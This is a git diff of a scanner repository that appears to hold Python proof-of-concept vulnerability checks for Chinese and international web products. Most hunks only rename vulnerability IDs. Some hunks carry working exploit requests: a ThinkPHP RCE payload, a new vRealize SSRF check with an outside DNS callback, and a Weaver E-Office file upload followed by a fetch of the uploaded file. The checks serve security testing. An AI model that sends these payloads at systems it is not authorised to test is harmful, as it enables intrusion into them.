@@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "狮子鱼CMS ApigoodsController.class.php SQL注入漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "狮子鱼CMS", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/ShopXO/FileRead_CNVD_2021_15822/__pycache__/poc.cpython-38.pyc b/poc/ShopXO/FileRead_CNVD_2021_15822/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e6be89a Binary files /dev/null and b/poc/ShopXO/FileRead_CNVD_2021_15822/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/SonarQube/Info_Disclosure_CVE_2020_27986/__pycache__/poc.cpython-38.pyc b/poc/SonarQube/Info_Disclosure_CVE_2020_27986/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..6e66372 Binary files /dev/null and b/poc/SonarQube/Info_Disclosure_CVE_2020_27986/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/SonicWall_SSL_VPN/RCE_jarrewrite/__pycache__/poc.cpython-38.pyc b/poc/SonicWall_SSL_VPN/RCE_jarrewrite/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..13f055f Binary files /dev/null and b/poc/SonicWall_SSL_VPN/RCE_jarrewrite/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/SonicWall_SSL_VPN/RCE_jarrewrite/poc.py b/poc/SonicWall_SSL_VPN/RCE_jarrewrite/poc.py index 4846283..da4ed88 100644 --- a/poc/SonicWall_SSL_VPN/RCE_jarrewrite/poc.py +++ b/poc/SonicWall_SSL_VPN/RCE_jarrewrite/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "SonicWall SSL-VPN 远程命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "SonicWall SSL-VPN", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/TCC_斗象/Weak_Pass_ARL/__pycache__/poc.cpython-38.pyc b/poc/TCC_斗象/Weak_Pass_ARL/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..6605ce5 Binary files /dev/null and b/poc/TCC_斗象/Weak_Pass_ARL/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/TCC_斗象/Weak_Pass_ARL/poc.py b/poc/TCC_斗象/Weak_Pass_ARL/poc.py index 8aa0353..b1dbfec 100644 --- a/poc/TCC_斗象/Weak_Pass_ARL/poc.py +++ b/poc/TCC_斗象/Weak_Pass_ARL/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "斗象资产灯塔系统(ARL) 弱口令检测", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/__pycache__/poc.cpython-38.pyc b/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a89ed27 Binary files /dev/null and b/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/poc.py b/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/poc.py index 99ccec7..fa82607 100644 --- a/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/poc.py +++ b/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "TVT数码科技 NVMS-1000 路径遍历漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "NVMS-1000", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/TamronOS_IPTV/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/TamronOS_IPTV/Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2a26c89 Binary files /dev/null and b/poc/TamronOS_IPTV/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/TamronOS_IPTV/Info_Disclosure/poc.py b/poc/TamronOS_IPTV/Info_Disclosure/poc.py index a65599c..4215c17 100644 --- a/poc/TamronOS_IPTV/Info_Disclosure/poc.py +++ b/poc/TamronOS_IPTV/Info_Disclosure/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "TamronOS IPTV系统 后台配置敏感信息", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "TamronOS IPTV系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/TamronOS_IPTV/RCE_api_ping/__pycache__/poc.cpython-38.pyc b/poc/TamronOS_IPTV/RCE_api_ping/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..bec6c74 Binary files /dev/null and b/poc/TamronOS_IPTV/RCE_api_ping/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/TamronOS_IPTV/RCE_api_ping/poc.py b/poc/TamronOS_IPTV/RCE_api_ping/poc.py index eba2a7f..f043265 100644 --- a/poc/TamronOS_IPTV/RCE_api_ping/poc.py +++ b/poc/TamronOS_IPTV/RCE_api_ping/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "TamronOS IPTV系统存在前台命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "TamronOS IPTV系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/TamronOS_IPTV/User_Add_Submit/__pycache__/poc.cpython-38.pyc b/poc/TamronOS_IPTV/User_Add_Submit/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1e86e69 Binary files /dev/null and b/poc/TamronOS_IPTV/User_Add_Submit/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/TamronOS_IPTV/User_Add_Submit/poc.py b/poc/TamronOS_IPTV/User_Add_Submit/poc.py index e1b546c..71d34fc 100644 --- a/poc/TamronOS_IPTV/User_Add_Submit/poc.py +++ b/poc/TamronOS_IPTV/User_Add_Submit/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "TamronOS IPTV系统 submit 任意用户创建漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "TamronOS IPTV系统", # 漏洞应用名称 "AppVersion" : "None", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Thinkphp/RCE_5022_5129/__pycache__/poc.cpython-38.pyc b/poc/Thinkphp/RCE_5022_5129/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..47ef691 Binary files /dev/null and b/poc/Thinkphp/RCE_5022_5129/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Thinkphp/RCE_5022_5129/poc.py b/poc/Thinkphp/RCE_5022_5129/poc.py index c343be7..193256f 100644 --- a/poc/Thinkphp/RCE_5022_5129/poc.py +++ b/poc/Thinkphp/RCE_5022_5129/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "ThinkPHP5", # 漏洞应用名称 "AppVersion" : "ThinkPHP5 5.0.22/5.1.29", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Thinkphp/RCE_5023/__pycache__/poc.cpython-38.pyc b/poc/Thinkphp/RCE_5023/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..258683c Binary files /dev/null and b/poc/Thinkphp/RCE_5023/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Thinkphp/RCE_5023/poc.py b/poc/Thinkphp/RCE_5023/poc.py index f4229f5..42cbfd4 100644 --- a/poc/Thinkphp/RCE_5023/poc.py +++ b/poc/Thinkphp/RCE_5023/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "ThinkPHP5 5.0.23 远程代码执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "ThinkPHP5", # 漏洞应用名称 "AppVersion" : "ThinkPHP5 <= 5.0.23", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx @@ -45,8 +45,9 @@ class POC(POCBase): """ vuln = [False,""] url = self.target + "/index.php?s=captcha" # url自己按需调整 - data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=-1" - + # data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=-1" + data = "_method=__construct&method=get&filter=call_user_func&get[]=phpinfo" + headers = {"User-Agent":get_random_ua(), "Connection":"close", "Content-Type": "application/x-www-form-urlencoded", @@ -57,10 +58,7 @@ class POC(POCBase): 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ req = requests.post(url,data = data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) - if "PHP Version" in req.text and \ - "Configure Command" in req.text and \ - "phpinfo()" in req.text and \ - req.status_code == 200: + if "phpinfo()" in req.text and req.status_code == 200: vuln = [True,req.text] else: vuln = [False,req.text] diff --git a/poc/Tongda_通达OA/AnyUser_Login_Version2017/__pycache__/poc.cpython-38.pyc b/poc/Tongda_通达OA/AnyUser_Login_Version2017/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..42aa3dc Binary files /dev/null and b/poc/Tongda_通达OA/AnyUser_Login_Version2017/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Tongda_通达OA/AnyUser_Login_Version2017/poc.py b/poc/Tongda_通达OA/AnyUser_Login_Version2017/poc.py index 93b5fd4..bc2a449 100644 --- a/poc/Tongda_通达OA/AnyUser_Login_Version2017/poc.py +++ b/poc/Tongda_通达OA/AnyUser_Login_Version2017/poc.py @@ -36,7 +36,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/Tongda_通达OA/Computer_Name_Plugin/__pycache__/poc.cpython-38.pyc b/poc/Tongda_通达OA/Computer_Name_Plugin/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..bf4e427 Binary files /dev/null and b/poc/Tongda_通达OA/Computer_Name_Plugin/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Tongda_通达OA/Sql_inj_TongDa/__pycache__/poc.cpython-38.pyc b/poc/Tongda_通达OA/Sql_inj_TongDa/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..64ae945 Binary files /dev/null and b/poc/Tongda_通达OA/Sql_inj_TongDa/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Tongda_通达OA/Version_Info_Plugin/__pycache__/poc.cpython-38.pyc b/poc/Tongda_通达OA/Version_Info_Plugin/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1a59c7c Binary files /dev/null and b/poc/Tongda_通达OA/Version_Info_Plugin/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/__pycache__/poc.cpython-38.pyc b/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..bf47d83 Binary files /dev/null and b/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/poc.py b/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/poc.py index d606918..0d7e4ab 100644 --- a/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/poc.py +++ b/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "艾泰网络管理系统弱口令", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "艾泰网络管理系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/VMware/File_read_vCenter/__pycache__/poc.cpython-38.pyc b/poc/VMware/File_read_vCenter/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8989fff Binary files /dev/null and b/poc/VMware/File_read_vCenter/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/VMware/SSRF_vRealize_CVE_2021_21975/__pycache__/poc.cpython-38.pyc b/poc/VMware/SSRF_vRealize_CVE_2021_21975/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..bd9f7fe Binary files /dev/null and b/poc/VMware/SSRF_vRealize_CVE_2021_21975/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/VMware/SSRF_vRealize_CVE_2021_21975/poc.py b/poc/VMware/SSRF_vRealize_CVE_2021_21975/poc.py new file mode 100644 index 0000000..3b473e2 --- /dev/null +++ b/poc/VMware/SSRF_vRealize_CVE_2021_21975/poc.py @@ -0,0 +1,87 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua,get_ceye_dns,verify_ceye_dns +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975", # 漏洞名称 + "VulnID" : "CVE-2021-21975", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "VMware vRealize Operations Manager", # 漏洞应用名称 + "AppVersion" : """ + VMware:vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0 + VMware:cloud_foundation: 4.x 3.x + VMware:vRealize_suite_lifecycle_manager: 8.x + """, # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + vRealize Operations Manager API包含服务器端请求伪造。 + 可以通过网络访问vRealize Operations Manager API的恶意攻击者可以执行服务器端请求伪造攻击(SSRF),以窃取管理凭据。 + """, # 漏洞简要描述 + + "fofa-dork":""" + title="vRealize Operations Manager" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/casa/nodes/thumbprints" # url自己按需调整 + + success,dns_flag = get_ceye_dns() + if success == False: + return [False,dns_flag] + + data = """["%s"]""" % (dns_flag) + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/json;charset=UTF-8", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + + flager = verify_ceye_dns(dns_flag) + + if flager == True: + vuln = [True,dns_flag] + elif flager == False: + vuln = [False,dns_flag] + else: + vuln = [False,flager] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/Venustech_启明星辰/SQLi_Reportguide/__pycache__/poc.cpython-38.pyc b/poc/Venustech_启明星辰/SQLi_Reportguide/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..53c0499 Binary files /dev/null and b/poc/Venustech_启明星辰/SQLi_Reportguide/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Venustech_启明星辰/SQLi_Reportguide/poc.py b/poc/Venustech_启明星辰/SQLi_Reportguide/poc.py index ee0477b..541b37c 100644 --- a/poc/Venustech_启明星辰/SQLi_Reportguide/poc.py +++ b/poc/Venustech_启明星辰/SQLi_Reportguide/poc.py @@ -19,7 +19,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "天玥运维网关/网御网络审计 Sql注入漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 "AppVersion" : """ 天玥运维安全网关V6.0 diff --git a/poc/VoIPmonitor/RCE_CVE_2021_30461/__pycache__/poc.cpython-38.pyc b/poc/VoIPmonitor/RCE_CVE_2021_30461/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..9e98f28 Binary files /dev/null and b/poc/VoIPmonitor/RCE_CVE_2021_30461/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/WayosAC/WayosAC/__pycache__/poc.cpython-38.pyc b/poc/WayosAC/WayosAC/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b838c0c Binary files /dev/null and b/poc/WayosAC/WayosAC/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/WayosAC/poc.py b/poc/WayosAC/WayosAC/poc.py similarity index 100% rename from poc/WayosAC/poc.py rename to poc/WayosAC/WayosAC/poc.py diff --git a/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..3550e66 Binary files /dev/null and b/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/poc.py b/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/poc.py index 80250d6..0683c9e 100644 --- a/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/poc.py +++ b/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/poc.py @@ -4,7 +4,6 @@ from lib.core.common import url_handle,get_random_ua from lib.core.poc import POCBase # ... import urllib3 -import pyDes urllib3.disable_warnings() class POC(POCBase): @@ -22,7 +21,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "泛微 e-cology OA 数据库配置信息泄露漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "泛微 e-cology", # 漏洞应用名称 "AppVersion" : "目前已知为8.100.0531,不排除其他版本,包括不限于EC7.0、EC8.0", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx @@ -84,4 +83,4 @@ class POC(POCBase): return vuln def _attack(self): - return self._verify() \ No newline at end of file + return self._verify() diff --git a/poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b39a78b Binary files /dev/null and b/poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/Config_Info_Disclosure_E-cology_V9/poc.py b/poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/poc.py similarity index 100% rename from poc/Weaver_泛微OA/Config_Info_Disclosure_E-cology_V9/poc.py rename to poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/poc.py diff --git a/poc/Weaver_泛微OA/File_Read_E_Bridge/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/File_Read_E_Bridge/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8d18419 Binary files /dev/null and b/poc/Weaver_泛微OA/File_Read_E_Bridge/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/File_Read_E_Bridge/poc.py b/poc/Weaver_泛微OA/File_Read_E_Bridge/poc.py index 7ae0ab4..a84702e 100644 --- a/poc/Weaver_泛微OA/File_Read_E_Bridge/poc.py +++ b/poc/Weaver_泛微OA/File_Read_E_Bridge/poc.py @@ -20,7 +20,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "泛微云桥 e-Bridge 任意文件读取漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "泛微云桥 e-Bridge", # 漏洞应用名称 "AppVersion" : "泛微云桥 e-Bridge 2018-2019 多个版本", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7a9c171 Binary files /dev/null and b/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/poc.py b/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/poc.py index 78caf79..b819bc3 100644 --- a/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/poc.py +++ b/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "泛微OA E-Office V9文件上传漏洞(CNVD-2021-49104)", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "泛微OA E-Office", # 漏洞应用名称 "AppVersion" : "E-Office V9", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a982fe8 Binary files /dev/null and b/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py b/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/poc.py similarity index 57% rename from poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py rename to poc/Weaver_泛微OA/File_Upload_E_Office_ajax/poc.py index 8c1734f..01a195b 100644 --- a/poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py +++ b/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/poc.py @@ -1,6 +1,6 @@ # coding:utf-8 import requests -from lib.core.common import url_handle,get_random_ua +from lib.core.common import url_handle,get_random_ua,random_str from lib.core.poc import POCBase import re # ... @@ -10,17 +10,17 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "hansi", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2022-1-10", # POC创建时间 "UpdateDate" : "2022-1-10", # POC创建时间 "PocDesc" : """ - 原POC逻辑过于简单,存在大量误报,现已优化 + """, # POC描述,写更新描述,没有就不写 - "name" : "泛微e-office存在前台文件上传漏洞" , # 漏洞名称 + "name" : "泛微E-Office存在前台文件上传漏洞" , # 漏洞名称 "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 - "AppName" : "泛微-EOffice", # 漏洞应用名称 + "AppName" : "泛微 E-Office", # 漏洞应用名称 "AppVersion" : "无", # 漏洞应用版本 "VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx "VulnDesc" : """ @@ -28,9 +28,9 @@ class POC(POCBase): """ , # 漏洞简要描述 "fofa-dork":"" , """ - app="泛微-EOffice" + """ # fofa搜索语句 - "example" : "http://219.153.106.177:81/", # 存在漏洞的演示url,写一个就可以了 + "example" : "", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 } @@ -46,32 +46,38 @@ class POC(POCBase): 不存在漏洞:vuln = [False,""] """ vuln = [False,""] - url = self.target + "/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save" # url自己按需调整 - # date="command1=shell:ifconfig| dd of=/tmp/a.txt" + url0 = self.target + "/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save" # url0自己按需调整 headers = {"User-Agent":get_random_ua(), "Connection":"close", - # "Content-Type": "application/x-www-form-urlencoded", + "Content-Type": "multipart/form-data; boundary=12f83ada5e3c205e29da579b538944ff", } - data = """Content-Type: multipart/form-data; boundary=12f83ada5e3c205e29da579b538944ff - + flag = random_str() + data = """ --12f83ada5e3c205e29da579b538944ff Content-Disposition: form-data; name="upload_quwan"; filename="test.php4" Content-Type: application/octet-stream - + --12f83ada5e3c205e29da579b538944ff -""" +""".format(flag=flag) try: """ 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动 """ - req = requests.post(url,headers = headers , data = data, proxies = self.proxy , timeout = self.timeout,verify = False) - result = re.match("\[\d,\".+\",\d{10},\"\.\"\]",req.text.strip()) - if req.status_code == 200 and result != None: - vuln = [True,req.text] + req0 = requests.post(url0,headers = headers , data = data, proxies = self.proxy , timeout = self.timeout,verify = False) + reg = """\[\d,".+",\d+.".+.php4"]""" + result = re.match(reg,req0.text.strip()) + if req0.status_code == 200 and result : + urls = result.group()[1:-1].split(",") + dic1 = urls[2].strip("\"") + dic2 = urls[3].strip("\"") + url1 = self.target + "/attachment//" + dic1 + "//" + dic2 + req1 = requests.get(url1,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False) + if req1.status_code == 200 and flag in req1.text: + vuln = [True,req1.text] else: - vuln = [False,req.text] + vuln = [False,req0.text] except Exception as e: raise e @@ -80,6 +86,5 @@ Content-Type: application/octet-stream return vuln - def _attack(self): return self._verify() \ No newline at end of file diff --git 